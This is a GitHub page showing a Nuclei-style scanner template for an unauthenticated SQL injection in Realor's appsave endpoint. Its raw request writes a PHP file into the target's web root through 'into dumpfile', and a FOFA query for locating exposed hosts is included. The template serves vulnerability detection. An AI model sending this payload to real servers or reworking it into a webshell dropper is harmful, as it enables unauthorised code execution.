-
Notifications
You must be signed in to change notification settings - Fork 1
/
realor-appsave-sqli-rce.yaml
35 lines (30 loc) · 1.31 KB
/
realor-appsave-sqli-rce.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
id: realor-appsave-sqli-rce
info:
name: Realor appsave - Remote Code Execution
author: Co5mos
severity: high
description: |
Realor Application Virtualization System's /Home/Controller/AdminController contains two interfaces, appsave and appdel, which do not require authentication and are vulnerable to SQL injection. Unauthorized attackers can exploit this vulnerability to obtain sensitive information. As the default configuration does not restrict the MySQL write file path through secure_file_priv, attackers can exploit this vulnerability to read and write any local file, thereby executing arbitrary code remotely.
reference:
- https://mp.weixin.qq.com/s/S8I2SIqzl_npSjWIqtru2Q
metadata:
fofa-query: app="REALOR-天翼应用虚拟化系统"
tags: realor,sqli,rce
variables:
num: "999999999"
filename: "{{rand_base(5)}}.php"
http:
- raw:
- |
GET /hmrao.php?s=/Admin/appsave&appid=1');select+'<?php+echo+md5({{num}});unlink(__FILE__);?>'+into+dumpfile+'../../WebRoot/{{filename}}';--+</ HTTP/1.1
Host: {{Hostname}}
- |
GET /{{filename}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code_1 == 200
- status_code_2 == 200
- contains(body_2, "c8c605999f3d8352d7bb792cf3fdb25")
condition: and